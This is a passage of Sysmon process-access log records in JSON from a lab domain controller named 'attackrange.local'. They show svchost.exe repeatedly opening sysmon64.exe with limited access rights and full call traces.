l.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4018,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.983\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.983","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4019,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.983\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.983","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4020,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.983\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.983","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4021,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.983\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.983","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4022,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.983\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.983","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4023,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.983\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.983","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4024,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.983\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.983","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4025,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.983\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.983","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
